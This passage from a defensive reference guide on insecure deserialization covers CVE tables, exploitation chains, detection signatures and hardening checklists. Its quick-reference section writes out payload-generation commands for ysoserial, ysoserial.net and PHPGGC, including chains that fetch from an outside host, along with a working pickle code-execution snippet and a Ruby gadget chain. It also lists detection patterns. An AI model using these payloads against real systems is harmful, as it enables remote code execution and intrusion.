CVE-2019-11043PHP-FPMAdjacent (not pure deser)
CVE-2020-28949Archive_TarPhar deser via tar extract
CVE-2021-41773(Apache path traversal, adjacent)
CVE-2023-1671Sophos Web AppliancePHP deser RCE
CVE-2024-4577PHP CGIAdjacent argument injection
CVE-2026-3422U-Office ForceCritical RCE via insecure deserialization

Python

CVEProductPattern
CVE-2017-7610Ansible TowerYAML deser
CVE-2019-20477PyYAMLFullLoader bypass
CVE-2020-14343PyYAMLBypass of earlier fix
CVE-2022-0330graphql-pythonpickle session
CVE-2023-27586torch.loadPre-weights_only default
CVE-2025-32444vLLM MooncakeZeroMQ recv_pyobj() on 0.0.0.0 (CVSS 10.0)
CVE-2025-24357vLLMTorch checkpoint untrusted load
CVE-2026-24009DoclingPyYAML regression via unpinned dep
CVE-2026-25769WazuhCritical RCE via unsafe deserialization
CVE-2026-26220LightLLMWebSocket pickle with broken nonce auth
CVE (picklescan)picklescan4 separate bypass CVEs in 2025 (Sonatype)
CVE (picklescan)picklescan3 zero-days disclosed by JFrog
IBM Langflow DesktopLangflowRCE via insecure deserialization

.NET

CVEProductPattern
CVE-2017-9424SharePointXmlSerializer with untyped payload
CVE-2019-0604SharePointXmlSerializer via ItemMetadata
CVE-2020-0688ExchangeViewState forgery with static machine key
CVE-2020-0932SharePointBinaryFormatter
CVE-2020-25258Hyland OnBaseBinaryFormatter
CVE-2021-27076SharePointReplay-style ObjectStateFormatter
CVE-2021-29508Wire (Proto.Actor)BinaryFormatter-backed IPC
CVE-2022-21969ExchangeBinaryFormatter in MAPI
CVE-2023-3513Razer CentralBinaryFormatter named pipe
CVE-2023-5914CentralSquareBinaryFormatter
CVE-2024-29847Ivanti EPMAgent Portal deserialization
CVE-2024-38094SharePointXML deserialization
CVE-2025-53770SharePoint ToolShellViewState deser chain, actively exploited
CVE-2026-20963SharePointDeserialization RCE
CVE-2026-26114SharePointDeserialization RCE
SolarWinds WHDWeb Help DeskJava deserialization enabling command execution

Ruby

CVEProductPattern
CVE-2013-0156RailsYAML in XML params
CVE-2019-5420Rails 5.2Marshal in dev mode secret key
CVE-2020-8163RailsLocal variables in partials
CVE-2022-32224Rails:marshal cache store user-reachable
RubyGems.orgMultiple informational-severity Marshal issues (ToB audit)

Notable exploitation chains

SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.

WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.

Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.

Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.

Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.


12. Tools & Automation

Offensive tooling (used defensively for payload generation, detection, and validation)

ToolLanguagePurpose
ysoserialJavaCanonical Java deserialization payload generator (~30 chains)
ysoserial.net.NETEquivalent for .NET with ~15 gadget families including XAML chains
marshalsecJavaNon-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO
PHPGGCPHPCurated PHP POP chain database and payload generator
FicklingPythonPickle decompiler, static analyzer, payload constructor
ModelScanPythonML model file scanner (ProtectAI)
picklescanPythonHuggingFace’s blocklist scanner (known bypasses exist)
GadgetProbeJavaDNS-based blind classpath fingerprinting
FreddyBurp pluginInjects deserialization payloads across formats
SerialKillerJavaRuntime allowlist enforcement (wrap around ObjectInputStream)
not-so-serialJavaRuntime blocklist enforcement
ConstructionInspectorJavaBuild-time gadget detection via classpath analysis
Semgrep rulesMultiTrailOfBits published rules for Ruby (marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization)
CodeQL queriesMultiGitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C#

ysoserial usage (defensive validation)

Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and command; it emits serialized bytes suitable for piping into a test harness that represents your application’s deserialization sink. Chains select which library prerequisites must be on the classpath to succeed.

marshalsec

Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.

PHPGGC

./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, Wordpress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list chains, -u to URL-encode, -b64 to base64, --phar to produce a PHAR file (for the phar:// trick).

Fickling

Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.

Build-time detection

  • Dependency scanning: identify commons-collections, commons-beanutils, spring-core, jackson-databind, xstream, groovy, hibernate, c3p0, rome, snakeyaml versions against known-vulnerable ranges.
  • Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
  • SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.

Runtime detection

  • Java: ObjectInputFilter (JEP 290, JDK 9+) allows allowlist/blocklist of classes during readObject. Available on modern JDKs for legacy code that cannot be rewritten.
  • .NET: the SerializationBinder property on BinaryFormatter allows restricting types; however, Microsoft’s own guidance states this is insufficient and BinaryFormatter should be retired entirely.
  • Ruby: Marshal.load has no type filter. Wrap in a custom class-checking loader or migrate.
  • Python: subclassing pickle.Unpickler and overriding find_class to allowlist is the documented approach. It works but is fragile — see picklescan bypass research.

13. Detection & Static Analysis

Taint source → sink patterns

LanguageSourceSink
JavaHttpServletRequest.getInputStream()new ObjectInputStream(...).readObject()
Javarequest.getParameter(...)Base64.decodereadObject, XMLDecoder.readObject
PHP$_GET, $_POST, $_COOKIE, file_get_contents("php://input")unserialize, yaml_parse
PHPAny user-controlled pathfile_exists("phar://$path"), filesize, is_dir
Pythonrequest.data, websocket.receive_bytes, socket.recvpickle.loads, joblib.load, torch.load
PythonFile path from DB / config / uploadyaml.load, yaml.unsafe_load
.NETRequest.Form, Request.InputStream, Request["__VIEWSTATE"]BinaryFormatter.Deserialize, ObjectStateFormatter.Deserialize
.NETJsonConvert.DeserializeObject with TypeNameHandling != NoneThe call itself
Rubyparams[:data], cookies[:session]Marshal.load, YAML.load (unsafe), Oj.load default
Node.jsreq.body, req.queryserialize.unserialize, eval, vm.runInNewContext

CodeQL query shape

GitHub Security Lab’s unsafe deserialization queries model:

  1. A set of known-dangerous deserialization calls as sinks.
  2. A standard HTTP-input taint source set.
  3. An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
  4. Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.

Semgrep / grep signatures

# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X)        # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: XStream().fromXML($X)       # without setupDefaultSecurity
pattern: Kryo.readClassAndObject(...)

# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."

# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...)            # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X)              # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()

# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())

# Ruby
pattern: Marshal.load(...)
pattern: YAML.load(...)             # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...)               # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder

# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)

Runtime telemetry signals

  • Java ClassNotFoundException bursts during deserialization — attacker probing which gadget classes exist.
  • Outbound DNS lookups correlated with request handlers — URLDNS probe pattern.
  • JRMP/LDAP outbound from app servers — JNDI gadget signal.
  • Process spawn by application JVM/CLR/PHP/Python workers — deserialization RCE footprint.
  • Unusual child processes under w3wp.exe — ViewState RCE.
  • Memory/CPU spikes with deep object graphs — DoS attempts.
  • readObject stack frames in production stack traces — inventory for review.

Log-based detection

Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.


14. Prevention & Mitigation

The hierarchy of fixes (strongest first)

1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”

2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key. Verify the signature before invoking any deserialization. This does not make deserialization safe — it merely ensures the bytes came from your own code. Ruby’s MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: key leaks (ASP.NET machine key, Rails secret_key_base) turn this from a hard problem into a trivial one, as ViewState exploits repeatedly demonstrate.

3. Apply type allowlists at the deserializer.

  • Java: ObjectInputFilter.Config.setSerialFilter(...) globally, or per-stream via oos.setObjectInputFilter(...) (JEP 290). Allowlist expected classes only.
  • .NET: abandon BinaryFormatter. If unavoidable, a SerializationBinder restricting types is the documented mitigation — but Microsoft explicitly says this cannot be made secure.
  • Python: subclass pickle.Unpickler, override find_class(module, name) to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies.
  • Ruby: wrap Marshal.load — no built-in filter exists. Trail of Bits recommends adding Marshal.safe_load upstream.
  • PHP: unserialize($data, ['allowed_classes' => ['ExpectedClass']]) (PHP 7.0+) restricts instantiation but does not prevent __wakeup/__destruct on allowed classes from being abused.

4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:

  • No network egress to metadata services or internal endpoints
  • Read-only filesystem where possible
  • Minimal privileges (non-root, no cloud credentials via IMDS)
  • Resource limits to bound DoS blast radius

5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.

Format-specific migration targets

FromTo
Java ObjectInputStreamJSON (Jackson with fixed types, no default typing) or Protobuf
PHP unserializejson_encode / json_decode with explicit fields
Python pickle for modelsSafetensors for tensors, ONNX for graphs, JSON for metadata
Python pickle for IPCJSON, MessagePack, Protobuf
Ruby MarshalJSON with typed columns, MessagePack, Protobuf
.NET BinaryFormatterSystem.Text.Json or DataContractSerializer with known types
ASP.NET ViewStateStateless pages, signed tokens, server-side session
YAML with typessafe_load / SafeConstructor; never yaml.load (Python pre-5.1) or Yaml().load (SnakeYAML <2.0)

ML pipeline hardening checklist

Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:

  • Migrate model weights to safetensors wherever possible. Default in HuggingFace transformers since 2022.
  • Set torch.load(..., weights_only=True) on every load site. torch.load without this is a code review finding.
  • Never call joblib.load on user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted.
  • Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
  • If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
  • Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf. recv_pyobj() is the anti-pattern.
  • Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations — LightLLM’s empty-string nonce is the cautionary tale.
  • Scan model uploads with ModelScan + Fickling, knowing both have bypasses.
  • Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
  • Log every model load path. Alert on loads from unexpected origins.

.NET / SharePoint hardening checklist (post-ToolShell)

  • Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
  • Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
  • Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
  • Restrict ViewState to MAC-validated, encrypted mode.
  • Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
  • Inventory BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter usages and plan retirement.
  • Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
  • Monitor w3wp.exe spawning cmd.exe, powershell.exe, certutil.exe.

Java hardening checklist

  • Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
  • Inventory and upgrade: commons-collections (>=3.2.2 removed unsafe functors; >=4.1 for 4.x), commons-beanutils (>=1.9.4), jackson-databind (latest), xstream (>=1.4.20), snakeyaml (>=2.0), log4j (>=2.17.1).
  • Remove Jackson default typing. Never call enableDefaultTyping() or set @JsonTypeInfo(use = Id.CLASS) on untrusted input.
  • Disable RMI registry exposure. Do not publish JMX on untrusted networks.
  • Retire XMLDecoder for untrusted input entirely.
  • Audit any custom readObject, readResolve, readExternal methods in your own code.
  • Set up outbound firewall rules from JVM processes — block unexpected JRMP/LDAP traffic.

PHP hardening checklist

  • Replace all unserialize($untrusted) with json_decode($untrusted) where possible.
  • Where replacement is infeasible, use unserialize($data, ['allowed_classes' => false]) or a tight allowlist.
  • Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
  • Audit all file operations for phar:// reachability from user input.
  • Store session data using a non-serializing handler or sign cookies.
  • Disable unserialize_callback_func.
  • Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.

Ruby hardening checklist

  • Replace Marshal.load(untrusted) with JSON with explicit schema.
  • Migrate Rails cache store off :marshal (Rails 7.1+ defaults to :json for some stores; verify).
  • Upgrade Ruby to 3.1+ for YAML.load safe default.
  • Disable JSON.parse(create_additions: true) and Oj.load default mode.
  • Run TrailOfBits’s Semgrep rules in CI: marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization.
  • Audit any custom marshal_load / marshal_dump methods.

15. Signature & Gadget Quick Reference

Magic bytes / payload prefixes

Java serialized (raw):        AC ED 00 05
Java serialized (base64):     rO0AB
.NET BinaryFormatter:         00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64):   AAEAAAD/////AQAAAA
Python pickle (proto 2):      80 02
Python pickle (proto 4):      80 04
Python pickle (proto 5):      80 05
Ruby Marshal:                 04 08
PHP serialized object:        O:<digit>+:"
PHP serialized array:         a:<digit>+:{
ASP.NET ViewState prefix:     /wEP / /wEX / /wET
PHAR stub:                    <?php __HALT_COMPILER();
SnakeYAML tag prefix:         !!javax. / !!org. / !!java.

Java ysoserial chain selector

ysoserial CommonsCollections1 "cmd"   # JDK ≤ 8u71 + commons-collections 3.x
ysoserial CommonsCollections5 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd"     # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd"               # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd"            # hibernate 3.x
ysoserial Jdk7u21 "cmd"               # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "rmi://host:port/obj"  # outbound JRMP
ysoserial URLDNS "http://probe.dns/"  # blind probe, no RCE
ysoserial Spring1 "cmd"               # older spring-core
ysoserial ROME "cmd"                  # ROME + Spring
ysoserial MozillaRhino1 "cmd"         # mozilla rhino
ysoserial Click1 "cmd"                # click framework
ysoserial Clojure "cmd"               # clojure 1.x
ysoserial C3P0 "http://host/" Exploit # c3p0 JNDI fetch + class

.NET ysoserial.net gadgets

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"

PHPGGC chain selector

phpggc -l laravel       # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id   # base64 URL-encoded
phpggc --phar=zip Monolog/RCE1 system id -o payload.phar

Python pickle one-liner test

import pickle, os
class P:
    def __reduce__(self):
        return (os.system, ("id",))
payload = pickle.dumps(P())
# Never use this on production systems — defensive validation only

Ruby Marshal gadget family (current canonical)

Gem::SpecFetcher
 └─ Gem::Version
     └─ Gem::RequestSet::Lockfile
         └─ Gem::RequestSet
             └─ Gem::Resolver::SpecSpecification
                 └─ Gem::Resolver::GitSpecification
                     └─ Gem::Source::Git
                         └─ git clone with backtick-injected reference
                             └─ shell metacharacter expansion → RCE

Magic method hooks by language

LanguageHooks fired during / after deserialization
JavareadObject, readResolve, readObjectNoData, readExternal, validateObject, custom finalize
PHP__wakeup, __unserialize, __destruct, __toString, __call, __invoke, __get, __set
Python (pickle)__reduce__, __reduce_ex__, __setstate__, __getstate__, __new__, __init_subclass__
.NET[OnDeserializing], [OnDeserialized], ISerializable.GetObjectData, constructor with SerializationInfo, IDeserializationCallback.OnDeserialization
Ruby (Marshal)marshal_load, _load, _dump_data, init_with (YAML), encode_with
Node.jstoJSON, any property getters triggered during reconstruction, eval-based schemes via Function strings

Universal defensive rule of thumb

If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.


Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, TrailOfBits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.